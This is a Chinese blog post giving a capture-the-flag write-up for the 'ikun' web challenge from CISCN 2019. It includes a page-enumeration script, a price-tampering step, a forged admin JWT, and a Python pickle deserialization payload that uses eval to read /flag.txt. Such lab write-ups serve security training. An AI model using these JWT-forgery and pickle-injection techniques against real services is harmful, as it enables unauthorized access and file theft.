[CISCN2019 华北赛区 Day1 Web2]ikun

最新推荐文章于 2023-02-20 18:01:18 发布
最新推荐文章于 2023-02-20 18:01:18 发布
阅读量92 收藏
点赞数 1
文章标签: ci 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53460654/article/details/121107526
版权

打开环境 注册一个账号 进去发现提示
在这里插入图片描述
随便点两页 直接写个脚本

import requests
import time
url='http://d5a20c05-ae4a-43b6-9882-cd61dee0a934.node4.buuoj.cn:81/shop?page='
for i in range(0,200):
    print(i)
    payload=url+str(i)
    a = requests.get(payload)
    if "lv6.png" in a.text:
        print("answer:"+str(i))
        break

在这里插入图片描述
来到181页 发现购买操作失败 我们抓包来看看
在这里插入图片描述
发现有折扣,所以我们看看改小一点,改到我们能购买的金额数
在这里插入图片描述
发现了出现了重定向 我们访问一下
在这里插入图片描述
提示我们需要admin才能访问 然后我们抓包发现有jwt身份验证
直接去网站解密之后修改为admin,然后再用工具爆破出第三部分
在这里插入图片描述

在这里插入图片描述
伪造后的签名为

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo

然后我们进去叫我们成为大会员 点了没有跳转
我们在源码中找到
在这里插入图片描述
然后我们在源码里面发现了利用点
在这里插入图片描述
就很简单的反序列化利用点

import pickle
import urllib

class payload(object):
    def __reduce__(self):
       return (eval, ("open('/flag.txt','r').read()",))

a = pickle.dumps(payload())
a = urllib.quote(a)
print a

在这里插入图片描述

M1kael
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
ikun-kunkun-吃掉坤坤爱坤-html-源码.rar
03-30
是爱坤你就来
ikun.exe
10-19
ikun.exe
[BUUCTF][CISCN2019 华北赛区 Day1 Web2]ikun
Y4tacker的博客
09-01 7304
文章目录知识点JWTPICKLEWP部分第一步找到lv6第二步BURP抓包修改pickel参考文章 知识点 JWT JWT相关 JWT解密网站 JWT破解利用工具 PICKLE Pickle模块中最常用的函数为: (1)pickle.dump(obj, file, [,protocol]) 函数的功能:将obj对象序列化存入已经打开的file中。 参数讲解: obj:想要序列化的obj对象。 file:文件名称。 protocol:序
CISCN2019_华北赛区_Day1_Web2]ikun_1通关手册
No_1_is_me的博客
11-14 1886
CISCN2019_华北赛区_Day1_Web2]ikun_1通关手册
[CISCN2019 华北赛区 Day1 Web2]ikun 1
weixin_43940853的博客
03-16 561
写一个python脚本 import requests url = 'http://c8f78f51-2593-4b2a-8e72-f39543bc99dd.node3.buuoj.cn/shop?page={}' for i in range(1000): r = requests.get(url.format(str(i))) if 'lv6.png' in r.text: ...
ikun电脑桌面宠物.exe
09-22
ikun电脑桌面宠物.exe
GT2大师探索版C02ROOT工具箱-1.exe
11-24
GT2大师探索版C02ROOT工具箱-1.exe
测试一下你是不是IKUN
10-05
代码秀:你干嘛!!!哎呦!!!
2019 CISCN华北赛区Day1 Web2】ikun
weixin_61951055的博客
11-08 781
2019 CISCN华北赛区Day1 Web2 WriteUp (全国大学生信息安全竞赛)
[CISCN2019 华北赛区 Day1 Web2]ikun以一道例题从JWT安全到Pickle反序列化
sGanYu
05-22 1232
这道题前面几关还是挺简单的,主要重点是JWT安全和Pickle反序列化的问题,所以前面的关卡就简单描述一下步骤 先去注册一个账户 注册完账户后,我们就来到了第一关,刚开始本来想注册一个admin用户的,没想到已经被注册了,那么我猜接下来的内容会和admin有关了 这里有一个提示,开局给了我们1000块,让我们去购买lv6,当前链接是http://29e104e9-b299-4014-b700-cc0b3892187b.node4.buuoj.cn:81/shop?page=2,每点击一次下一页,p
ikun必看,1000+真爱粉必备
m0_46589413的博客
02-20 381
ikun必看
[原题复现+审计][CISCN2019 华北赛区 Day1 Web2]ikun(逻辑漏洞、JWT伪造、python序列化)...
笑花大王
03-10 671
简介 原题复现:https://github.com/CTFTraining/zjctf_2019_final_web_nizhuansiwei/ 考察知识点:逻辑漏洞、JWT伪造、python反序列化 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 简介 打开看信息 看到这一块 ...
ikun python
最新发布
10-08
ikun python是指使用Python编写的一些项目或功能,其中包括ikun飞机大战和ikun音乐播放器。ikun飞机大战是一个使用Python和tkinter库开发的游戏,而ikun音乐播放器则是使用Python的tkinter和pygame库开发的一个音乐...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M1kael

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值